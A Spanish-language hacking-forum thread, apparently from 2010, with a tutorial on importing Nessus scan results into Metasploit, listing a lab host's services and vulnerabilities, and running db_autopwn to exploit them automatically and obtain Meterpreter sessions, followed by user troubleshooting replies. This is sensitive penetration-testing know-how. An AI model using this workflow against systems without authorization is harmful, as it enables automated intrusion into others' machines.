Pasar Resultado de escaneo de Nessus al MSF
[Metasploit By: Shell Root]
Ahora en este tutorial, explicaré como pasar los resultados que nos arrojo el scaner
Nessus al
Metasploit.
Porque hacer esto? Bueno, tendremos la informacion ordenada y lista para poner en ejecución el comando
db_autopwn, que es el que se encarga de explotar las vulnerabilidas encontradas con el Scaner, automaticamente. Empecemos!
Inicializamos la consola del
Metasploitshell@ShellRoot:~/msf3$ ./msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
=[ metasploit v3.3.3-release [core:3.3 api:1.0]
+ -- --=[ 481 exploits - 220 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops
msf >
Despues de haber escaneado la Dirección IP con el scanner Nessus exportamos el resultado dentro de un archivo con extensión
.nbe, depues dentro del metasploit crearemos una base de datos con los datos que estan dentro del archivo de Nessus. Asi:
msf > db_destroy
[*] Deleting /home/shell/.msf3/sqlite3.db...
msf > db_create
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: /home/shell/.msf3/sqlite3.db
msf >
Miramos que comandos podemos usar
msf > help
Database Backend Commands
=========================
Command Description
------- -----------
db_add_host Add one or more hosts to the database
db_add_note Add a note to host
db_add_port Add a port to host
db_autopwn Automatically exploit everything
db_connect Connect to an existing database
db_create Create a brand new database
db_del_host Delete one or more hosts from the database
db_del_port Delete one port from the database
db_destroy Drop an existing database
db_disconnect Disconnect from the current database instance
db_driver Specify a database driver
db_hosts List all hosts in the database
db_import_amap_mlog Import a THC-Amap scan results file (-o -m)
db_import_nessus_nbe Import a Nessus scan result file (NBE)
db_import_nessus_xml Import a Nessus scan result file (NESSUS)
db_import_nmap_xml Import a Nmap scan results file (-oX)
db_nmap Executes nmap and records the output automatically
db_notes List all notes in the database
db_services List all services in the database
db_vulns List all vulnerabilities in the database
db_workspace Switch between database workspaces
Importamos el archivo así:
msf > db_import_nessus_nbe /home/shell/192.168.0.5.nbe
Para mirar los Host escaneados, ejecutamos este comando:
msf > db_hosts
Hosts
=====
address address6 arch comm created info mac name os_flavor os_lang os_name os_sp state Svcs Vulns Workspace
------- -------- ---- ---- ------- ---- --- ---- --------- ------- ------- ----- ----- ---- ----- ---------
192.168.0.5 Fri Jan 01 19:22:13 -0500 2010 alive 10 14 default
msf >
Para mirar los servicios que estan corriendo, ejecutamos este comando:
msf > db_services
Services
========
created info name port proto state Host Workspace
------- ---- ---- ---- ----- ----- ---- ---------
Fri Jan 01 19:22:14 -0500 2010 smtp 25 tcp up 192.168.0.5 default
Fri Jan 01 19:22:14 -0500 2010 http 80 tcp up 192.168.0.5 default
Fri Jan 01 19:22:14 -0500 2010 epmap 135 tcp up 192.168.0.5 default
Fri Jan 01 19:22:13 -0500 2010 netbios-ns 137 udp up 192.168.0.5 default
Fri Jan 01 19:22:13 -0500 2010 netbios-ssn 139 tcp up 192.168.0.5 default
Fri Jan 01 19:22:14 -0500 2010 https 443 tcp up 192.168.0.5 default
Fri Jan 01 19:22:13 -0500 2010 microsoft-ds 445 tcp up 192.168.0.5 default
Fri Jan 01 19:22:14 -0500 2010 blackjack 1025 tcp up 192.168.0.5 default
Fri Jan 01 19:22:14 -0500 2010 ms-wbt-server 3389 tcp up 192.168.0.5 default
Fri Jan 01 19:22:14 -0500 2010 Elite 31337 tcp up 192.168.0.5 default
msf >
Para mirar las vulnerabilidades encontradas, ejecutamos este comando:
msf > db_vulns
[*] Time: Fri Jan 01 19:22:13 -0500 2010 Vuln: host=192.168.0.5 port=139 proto=tcp name=NSS-11011 refs=
[*] Time: Fri Jan 01 19:22:13 -0500 2010 Vuln: host=192.168.0.5 port=445 proto=tcp name=NSS-11011 refs=
[*] Time: Fri Jan 01 19:22:13 -0500 2010 Vuln: host=192.168.0.5 port=137 proto=udp name=NSS-10150 refs=
[*] Time: Fri Jan 01 19:22:13 -0500 2010 Vuln: host=192.168.0.5 port=445 proto=tcp name=NSS-10394 refs=CVE-1999-0504,BID-494,CVE-2000-0222,CVE-1999-0505,BID-11199,CVE-1999-0506,BID-990,CVE-2005-3595,CVE-2002-1117
[*] Time: Fri Jan 01 19:22:14 -0500 2010 Vuln: host=192.168.0.5 port=445 proto=tcp name=NSS-10785 refs=
[*] Time: Fri Jan 01 19:22:14 -0500 2010 Vuln: host=192.168.0.5 port=445 proto=tcp name=NSS-35362 refs=OSVDB-52691,OSVDB-52692,CVE-2008-4114,BID-33121,BID-33122,OSVDB-48153,CVE-2008-4834,BID-31179,CVE-2008-4835
[*] Time: Fri Jan 01 19:22:15 -0500 2010 Vuln: host=192.168.0.5 port=445 proto=tcp name=NSS-26917 refs=
[*] Time: Fri Jan 01 19:22:15 -0500 2010 Vuln: host=192.168.0.5 port=445 proto=tcp name=NSS-10397 refs=OSVDB-300
[*] Time: Fri Jan 01 19:22:15 -0500 2010 Vuln: host=192.168.0.5 port=445 proto=tcp name=NSS-26920 refs=BID-494,CVE-2002-1117
[*] Time: Fri Jan 01 19:22:15 -0500 2010 Vuln: host=192.168.0.5 port=80 proto=tcp name=NSS-22964 refs=
[*] Time: Fri Jan 01 19:22:15 -0500 2010 Vuln: host=192.168.0.5 port=25 proto=tcp name=NSS-22964 refs=
[*] Time: Fri Jan 01 19:22:15 -0500 2010 Vuln: host=192.168.0.5 port=3389 proto=tcp name=NSS-10940 refs=
[*] Time: Fri Jan 01 19:22:16 -0500 2010 Vuln: host=192.168.0.5 port=1025 proto=tcp name=NSS-22319 refs=
[*] Time: Fri Jan 01 19:22:16 -0500 2010 Vuln: host=192.168.0.5 port=25 proto=tcp name=NSS-10263 refs=
msf >
Ahora estamos listos para la ejecucion del comando
db_autopwn. Miremos que parametros tiene disponible para la ejecución. Miramos que parametros necesitamos para correr el comando
db_autopwnmsf > db_autopwn
[*] Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-r Use a reverse connect shell
-b Use a bind shell on a random port (default)
-q Disable exploit module output
-R [rank] Only run modules with a minimal rank
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range
-PI [range] Only exploit hosts with these ports open
-PX [range] Always exclude hosts with these ports open
-m [regex] Only run modules whose name matches the regex
msf >
Solo son necesarios los parametros
-e -x. Esperamos que termine la ejecucion de los exploit y miramos las sessiones del Meterpreter.
By: Shell Root
Beeeeeeestiaaaaal
Si pudiese te lo archivaba xD
EDITO:
Como exporto a formato nbe?
Saludos
Respondemé:
- En que Sistema Operativo estás?
- Versión del Nessus?
Aclaro algo que me dijo
trashhgoo Cita de: trashhgooNessus 4.2.0 solo nos permite exportar los resultados en formato .nessus, .nessus (v1) o .html, así que cambia un poco.
Metasploit todavía no es compatible con .nessus v2 (Recalquemos el todavía), por lo que nos bajamos el report en .nessus (v1) y lo añadimos a la base de datos con db_import_nessus_xml.
msf > db_import_nessus_xml /home/trashhgoo/Descargas/0d28f764-5019-1d75-9cd5-ec79870b8056a915a167a3bb200f.nessus
msf > db_hosts
Hosts
=====
address address6 arch comm created info mac name os_flavor os_lang os_name os_sp state Svcs Vulns Workspace
------- -------- ---- ---- ------- ---- --- ---- --------- ------- ------- ----- ----- ---- ----- ---------
172.16.83.128 2010-01-02 21:03:12 +0100 alive 5 11 default
Saludines!
Cita de: Shell Root en 2 Enero 2010, 23:33 PM
Respondemé:
- En que Sistema Operativo estás?
- Versión del Nessus?
Aclaro algo que me dijo trashhgoo
Cita de: trashhgooNessus 4.2.0 solo nos permite exportar los resultados en formato .nessus, .nessus (v1) o .html, así que cambia un poco.
Metasploit todavía no es compatible con .nessus v2 (Recalquemos el todavía), por lo que nos bajamos el report en .nessus (v1) y lo añadimos a la base de datos con db_import_nessus_xml.
msf > db_import_nessus_xml /home/trashhgoo/Descargas/0d28f764-5019-1d75-9cd5-ec79870b8056a915a167a3bb200f.nessus
msf > db_hosts
Hosts
=====
address address6 arch comm created info mac name os_flavor os_lang os_name os_sp state Svcs Vulns Workspace
------- -------- ---- ---- ------- ---- --- ---- --------- ------- ------- ----- ----- ---- ----- ---------
172.16.83.128 2010-01-02 21:03:12 +0100 alive 5 11 default
Saludines!
ese es xD
Saludos y gracias
Y una vez hecho, me sale un espacio de linea y vuelve a salir el interprete.
Como miro las sesiones de meterpreter?
Saludos
Cita de: Shell Root en 3 Enero 2010, 19:09 PM
Cita de: ,.-~*´¨¯¨`*·~-.¸..::| D3Bć1 |::.,.-~*´¨¯¨`*·~-.¸ en 3 Enero 2010, 16:47 PMComo miro las sesiones de meterpreter?
Usa el comando sessions
Saludos!
es normal que no em encuentre ninguna vulnerabilidad?
Alguien me podria decir algun host donde poder probarlo o algun indicio donde poder hacerlo (siempre pidiendo permiso al propietario)
Saludos
Damn Vulnerable Linux
Cita de: ,.-~*´¨¯¨`*·~-.¸..::| D3Bć1 |::.,.-~*´¨¯¨`*·~-.¸ en 4 Enero 2010, 21:24 PMAlguien me podria decir algun host donde poder probarlo o algun indicio donde poder hacerlo (siempre pidiendo permiso al propietario)
Ahi tendrias muchas compicaciones, por lo
Firewall,
Avg's,
Router's.
ahi va mi pregunta de novato: Creo el archivo del nessus sin problema en formato xlm (.nessus) pero como lo ejecuto desde windows no se como llegar a la ruta del mismo!! Se algo de linux y me se manejar por carpetas y tal.. he estado buscando pero nada... :(
Cual es la ruta de C:???
Un saludo ;);)
Donde tienes instalado el MSF desde ahi se empieza la ruta es decir, ejecutas el LINK que se llama Cygwin Shell y empiezas a mirar que dentro de la carpeta de instación es la raiz es decir /home/. Intenta ponerlo ahi y empezas a recorrerlo como si fuera en Linux... :D
Saludos!
pone: the v2.nessus format in not currently supported (patches welcome) ???
Que es esto?
gracias
EDITO: Ya esta solucionado. Por si le pasa a otro el problema es que tengo en lesus version 4 y no reconoce los archivos de esta nueva versión. Sin embargo al guardar el reporte hay una opcion que pone descrgar en V1. Ese archivo .nessus si que lo le el metasploit! ;)
Leiste la aclaración que hize al principio... :·p
Cita de: Shell Root en 2 Enero 2010, 23:33 PMAclaro algo que me dijo trashhgoo
Cita de: trashhgooNessus 4.2.0 solo nos permite exportar los resultados en formato .nessus, .nessus (v1) o .html, así que cambia un poco.
Metasploit todavía no es compatible con .nessus v2 (Recalquemos el todavía), por lo que nos bajamos el report en .nessus (v1) y lo añadimos a la base de datos con db_import_nessus_xml.
msf > db_import_nessus_xml /home/trashhgoo/Descargas/0d28f764-5019-1d75-9cd5-ec79870b8056a915a167a3bb200f.nessus
msf > db_hosts
Hosts
=====
address address6 arch comm created info mac name os_flavor os_lang os_name os_sp state Svcs Vulns Workspace
------- -------- ---- ---- ------- ---- --- ---- --------- ------- ------- ----- ----- ---- ----- ---------
172.16.83.128 2010-01-02 21:03:12 +0100 alive 5 11 default
Saludines!
Lo siento.
muy interesante, muy util, Gracias ;D
Tambien se puede usar para Nmap!
Cita de: isseu en 15 Enero 2010, 04:11 AM
muy interesante, muy util, Gracias ;D
Tambien se puede usar para Nmap!
Por su pollo. Mirad... http://foro.elhacker.net/hacking_basico/nmap_metasploit_pasar_resultado_de_escaneo_de_nmap_al_msf-t279852.0.html
Lo que hace el metasploit de esta forma entonces es pasar todos los exploits disponibles en la version que tengamos de metasploit en funcion de los puertos del router que esten abiertos???
Es decir que si de esta forma no conseguimos una shell mejor olvidarnos de este modo para esa victima?
Un saludo y muy buen tutorial ;);)
Cita de: illera88 en 16 Enero 2010, 15:08 PMLo que hace el metasploit de esta forma entonces es pasar todos los exploits disponibles en la version que tengamos de metasploit en funcion de los puertos del router que esten abiertos???
WTF!
Cita de: illera88 en 16 Enero 2010, 15:08 PMEs decir que si de esta forma no conseguimos una shell mejor olvidarnos de este modo para esa victima?
Emmm, What!
Muchas Gracias...
buenas, una preguntuilla.
tengo montado un windows XP sp2 con firewall desactivado.
tiene el fallo del puerto 445 y con metasploit consigo una shell sin problemas.
El caso es que hago un escaneo por rango de mi red, encuentro vulns en la virtual y exporto el escaneo a nbe.
lo cargo al msf y al ejecutar el autopwn no me crea ninunga sesion, sin embargo si lo ago "a mano" si que me la crea.
se os ocurre algun motivo por lo que no cree la sesion meterpreter?
Tengo un problema cuando importo. Me aparece este mensaje.
msf > db_import_nessus_xml /home/shell/1bd3fa1a-e057-2e6d-5503-2afecb8e5262f0730b7b2c150c62.nessus
- Could not read the NESSUS file[/b]
cambiando home por root aparece esto
msf > db_import_nessus_xml /root/1bd3fa1a-e057-2e6d-5503-2afecb8e5262f0730b7b2c150c62.nessus
[-] Error while running command db_import_nessus_xml: Deprecated data column for vuln, use .info instead
Call stack:
/opt/metasploit3/msf3/lib/msf/core/db.rb:631:in `report_vuln'
/opt/metasploit3/msf3/lib/msf/core/db.rb:2027:in `handle_nessus'
/opt/metasploit3/msf3/lib/msf/core/db.rb:1781:in `import_nessus_xml'
/usr/lib/ruby/1.8/rexml/element.rb:892:in `each'
/usr/lib/ruby/1.8/rexml/xpath.rb:53:in `each'
/usr/lib/ruby/1.8/rexml/element.rb:892:in `each'
/opt/metasploit3/msf3/lib/msf/core/db.rb:1775:in `import_nessus_xml'
/usr/lib/ruby/1.8/rexml/element.rb:892:in `each'
/usr/lib/ruby/1.8/rexml/xpath.rb:53:in `each'
/usr/lib/ruby/1.8/rexml/element.rb:892:in `each'
/opt/metasploit3/msf3/lib/msf/core/db.rb:1772:in `import_nessus_xml'
/opt/metasploit3/msf3/lib/msf/core/db.rb:1765:in `import_nessus_xml_file'
/opt/metasploit3/msf3/lib/msf/ui/console/command_dispatcher/db.rb:917:in `cmd_db_import_nessus_xml'
/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:246:in `send'
/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:246:in `run_command'
/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:208:in `run_single'
/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:202:in `each'
/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:202:in `run_single'
/opt/metasploit3/msf3/lib/rex/ui/text/shell.rb:145:in `run'
./msfconsole:97
Esque no puedes cambiar directorios como loco!, pon la ruta de donde se encuentra el archivo.
Cita de: Kamps en 12 Mayo 2010, 01:06 AMmsf > db_import_nessus_xml /home/shell/1bd3fa1a-e057-2e6d-5503-2afecb8e5262f0730b7b2c150c62.nessus
(http://1.bp.blogspot.com/_bSHR55nKtoU/SWezU158Y0I/AAAAAAAAACE/3NFZKnqvP30/s400/doh_l-761608.gif)
No no si no lo había cambiado, lo tengo en el escritorio, y esa ruta ya la había probado.
msf > db_import_nessus_xml /home/shell/1bd3fa1a-e057-2e6d-5503-2afecb8e5262f0730b7b2c150c62.nessus
- Could not read the NESSUS file
Mmmm, no se, la base de datos está creada.. no se que puede ser.
Cita de: illera88 en 16 Enero 2010, 15:08 PM
Es decir que si de esta forma no conseguimos una shell mejor olvidarnos de este modo para esa victima?
En realidad no... :silbar:
Cita de: AgRos en 6 Septiembre 2010, 18:00 PM
tengo un problema pongo el comano db_destroy y me dice lo siguiente
This database command requires the following tools to be installed: dropdb
Instala dicha tool con el comando gem de ruby.
Saludos
msf > db_import_nessus_xml /root/nessus_report_solisur.nessus
[-] Database not connectedv
que estoy haciendo mal?
Qué versión de Nessus estáis usando?. Sí mal no recuerdo, la última versión no es compatible?
hola shell mira estoy practicando tu manual pero ala hora de poner db_destroy me sale este error
This database command requires the following tools to be installed: dropdb
me baje esta version de metasploit
metasploit v3.5.1-release [core:3.5 api:1.0]
mi version de nessus es 4.4.0